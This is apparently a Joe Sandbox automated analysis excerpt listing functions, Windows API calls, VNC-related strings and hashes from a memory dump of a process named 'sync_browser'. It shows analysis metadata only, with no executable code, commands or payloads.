Function 00007FF7400233A0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7400233D3

Strings

vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF740023490
vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF740023429
vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF740023502
vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF7400233D9

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
API String ID: 1452528299-2001727811
Opcode ID: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
Instruction ID: 303140f941988b3c37e451f25b348f0a288869e4454c754ea91137b0a6e3038b
Opcode Fuzzy Hash: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
Instruction Fuzzy Hash: 3F410766A09A45C1EB51BF26D4883ED67A1FB84F44F884076CA0D473A8DF39E989C321

Function 00007FF7400288A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF7400288F0
inet_ntoa.WS2_32 ref: 00007FF7400288FA

Part of subcall function 00007FF7400B92A4: malloc.LIBCMT ref: 00007FF7400B92C7

Part of subcall function 00007FF7400B7978: malloc.LIBCMT ref: 00007FF7400B7992

InitializeCriticalSection.KERNEL32 ref: 00007FF74002894B

Part of subcall function 00007FF7400979A0: EnterCriticalSection.KERNEL32 ref: 00007FF7400979C7
Part of subcall function 00007FF7400979A0: LeaveCriticalSection.KERNEL32 ref: 00007FF7400979E9
Part of subcall function 00007FF7400979A0: CreateSemaphoreA.KERNEL32 ref: 00007FF740097A03
Part of subcall function 00007FF7400979A0: GetLastError.KERNEL32 ref: 00007FF740097A15

Strings

<unavailable>, xrefs: 00007FF740028900

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
String ID: <unavailable>
API String ID: 4131039871-1096956887
Opcode ID: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
Instruction ID: 11ee4f3dbaa40371da74d5cb821a2662f717e9e88c0e4eb12ff824036dc21853
Opcode Fuzzy Hash: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
Instruction Fuzzy Hash: 6A319E3261DB81C2EB54EF60E8443A9B3A4FB88B94F940135DAAD477A8DF3CE455C750

Function 00007FF74006CD40 Relevance: 6.1, APIs: 4, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FF74006CD7A
gethostbyname.WS2_32 ref: 00007FF74006CD8C
htons.WS2_32 ref: 00007FF74006CDB1
connect.WS2_32 ref: 00007FF74006CDCB

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: connectgethostbynamehtonsinet_addr
String ID:
API String ID: 599670773-0
Opcode ID: f6108e8ca93ccc89ffbbcef9ae7f28c2dc192bc10360c91e264abe9a68236526
Instruction ID: 5aef53be8e73d6f082fe7e1cac2d1e75b598ee8ffa8f6f20828bed72586727d7
Opcode Fuzzy Hash: f6108e8ca93ccc89ffbbcef9ae7f28c2dc192bc10360c91e264abe9a68236526
Instruction Fuzzy Hash: F0116626B1CA41C1EB64BB65E840739B6A1FF88B95F404535E95E477A8DF3CE500C724

Function 00007FF7400B7978 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 00007FF7400B7986
malloc.LIBCMT ref: 00007FF7400B7992

Part of subcall function 00007FF7400B8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7400B8C64
Part of subcall function 00007FF7400B8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749,?,?,?,00007FF7400C77F3), ref: 00007FF7400B8C89
Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CA2
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CAD
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CB8

Strings

bad allocation, xrefs: 00007FF7400B79CF

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _callnewh_errno$AllocHeapmalloc
String ID: bad allocation
API String ID: 3727741168-2104205924
Opcode ID: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
Instruction ID: c2b0eba704e3a61a47a145bd7ddeb8dcfc2e2d4889260b6c4aac84af1403de67
Opcode Fuzzy Hash: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
Instruction Fuzzy Hash: F601F765A0CA47D0EA14BB50B8506B9E3A0BF99380FD41135D98D867BAEF7CF245CB20

Function 00007FF74006A290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32 ref: 00007FF74006A2C2
PostMessageA.USER32 ref: 00007FF74006A2E8

Strings

WinVNC Tray Icon, xrefs: 00007FF74006A2B9

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: FindMessagePostWindow
String ID: WinVNC Tray Icon
API String ID: 2578315405-1071638575
Opcode ID: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
Instruction ID: 569895b5ec4f3117c6e58409430aea67af7432cb54459141610fc542dd37f6da
Opcode Fuzzy Hash: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
Instruction Fuzzy Hash: 46017126F1CA81C2EA54BB02F440269A291EB88BC4F885032EE5E5376DDF3CE5918F10

Function 00007FF74006CC40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

shutdown.WS2_32 ref: 00007FF74006CC70
closesocket.WS2_32 ref: 00007FF74006CC7A

Strings

vsocket.cpp : closing socket, xrefs: 00007FF74006CC4F

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: closesocketshutdown
String ID: vsocket.cpp : closing socket
API String ID: 572888783-2569437896
Opcode ID: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
Instruction ID: fcc6c041712fc9ed912bda04f7e8da329a76fa5eb4a27a86003d9f66c38e9456
Opcode Fuzzy Hash: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
Instruction Fuzzy Hash: 8FF049B5A18B41C2EB14BF74D4942B87322FF88B25FA04A35C92E463E9DF38E455C360

Function 00007FF740097A70 Relevance: 5.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF740097AE5
GetLastError.KERNEL32 ref: 00007FF740097AEF
CloseHandle.KERNEL32 ref: 00007FF740097B17
GetLastError.KERNEL32 ref: 00007FF740097B21

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 03b786ac0191571c2e0cd19829045d780b45d4398104a6852bd75eb283c44f71
Instruction ID: f6993b7455909d035ee248a43c5835f26e309e0651933b80b6d29690f0127b4e
Opcode Fuzzy Hash: 03b786ac0191571c2e0cd19829045d780b45d4398104a6852bd75eb283c44f71
Instruction Fuzzy Hash: 93211732A1DA46C6EB51BF60E490769A3A0FF84B44F940131EA8E43BACDF3CE445C760

Function 00007FF74006DD90 Relevance: 4.6, APIs: 3, Instructions: 86networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00007FF74006DE1D
__WSAFDIsSet.WS2_32 ref: 00007FF74006DE5D
send.WS2_32 ref: 00007FF74006DE78

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: selectsend
String ID:
API String ID: 2999949978-0
Opcode ID: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
Instruction ID: 59346325c2644ec981a9affafa78c7f62f5048d827e505d8c36d29ee22b20082
Opcode Fuzzy Hash: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
Instruction Fuzzy Hash: FE310826F1C682C6EA607B15A8447BAF392BF95798F851432DD4D07B69DF3EF4018620

Function 00007FF7400C9234 Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7400C9257
HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C331F,?,?,?,00007FF7400C37F7,?,?,?,00007FF7400BFFD1), ref: 00007FF7400C928B
_callnewh.LIBCMT ref: 00007FF7400C92A2

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: AllocHeap_callnewh_errno
String ID:
API String ID: 849339952-0
Opcode ID: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
Instruction ID: 2af30711edb99f0650671a5815413d359cd28b7e6ed7f28606535150bc72fed3
Opcode Fuzzy Hash: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
Instruction Fuzzy Hash: 93118E21B0D242D1FE597F51E648778F291AF84BA4F888A30D95D46BECEF6CB4408620

Function 00007FF740014140 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00007FF7400141C0
FreeLibrary.KERNELBASE(?,?,?,00007FF740014124), ref: 00007FF7400141CF

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: FreeLibraryMessageSend
String ID:
API String ID: 3583424976-0
Opcode ID: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
Instruction ID: fbbf4a077e05d85b1169b1c06a532368078f654f957274b1c075136ea6eb769f
Opcode Fuzzy Hash: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
Instruction Fuzzy Hash: 3B111825F0E546E5FF69FFA19465678A364AF94B44F840535CE0E067B99E2DF480C320

Function 00007FF74006CBC0 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FF74006CBE6

Part of subcall function 00007FF74006CC40: shutdown.WS2_32 ref: 00007FF74006CC70
Part of subcall function 00007FF74006CC40: closesocket.WS2_32 ref: 00007FF74006CC7A

setsockopt.WS2_32 ref: 00007FF74006CC16

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: closesocketsetsockoptshutdownsocket
String ID:
API String ID: 3513852771-0
Opcode ID: 7d480c3a304c4e2f7ccf6cbbfd7f0a840315250e84bbd90c940829d90bbae2b2
Instruction ID: 4e8a5c365beb649add8c18b2f76f0da532835f076ab9cde6118d2e74ec4bb095
Opcode Fuzzy Hash: 7d480c3a304c4e2f7ccf6cbbfd7f0a840315250e84bbd90c940829d90bbae2b2
Instruction Fuzzy Hash: 04F0C2B6B2C243C7EB10BF24D811BB5B352AF40704F540A34DA29863E8DB7DF1858A20

Function 00007FF74006D170 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FF74006D1AA
setsockopt.WS2_32 ref: 00007FF74006D1D1

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
Instruction ID: 3abba659f30e9baacb81263a92b8eb555fcd689e3ee2c9fe466115f4c865f762
Opcode Fuzzy Hash: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
Instruction Fuzzy Hash: C6F09675A1818293E721AF70E4042B5F351FF85715F540A32DAAD8ABE8CBBCD19A8B10

Function 00007FF74006D1F0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00007FF74006D20D

Part of subcall function 00007FF74006DD90: select.WS2_32 ref: 00007FF74006DE1D

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CountTickselect
String ID:
API String ID: 2475007269-0
Opcode ID: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
Instruction ID: e9200ef71255958d8446d57aefa20be84354250dde9ed83c0c3f3a67f1f02bcc
Opcode Fuzzy Hash: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
Instruction Fuzzy Hash: E631CE36B08641C6EB04AF21E5941ADB762EB88B84F49843ACF094B79DDE38E4458760

Function 00007FF7400C32EC Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7400C9234: _errno.LIBCMT ref: 00007FF7400C9257

Sleep.KERNEL32(?,?,?,00007FF7400C37F7,?,?,?,00007FF7400BFFD1,?,?,?,?,00007FF7400B8C19), ref: 00007FF7400C3331

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
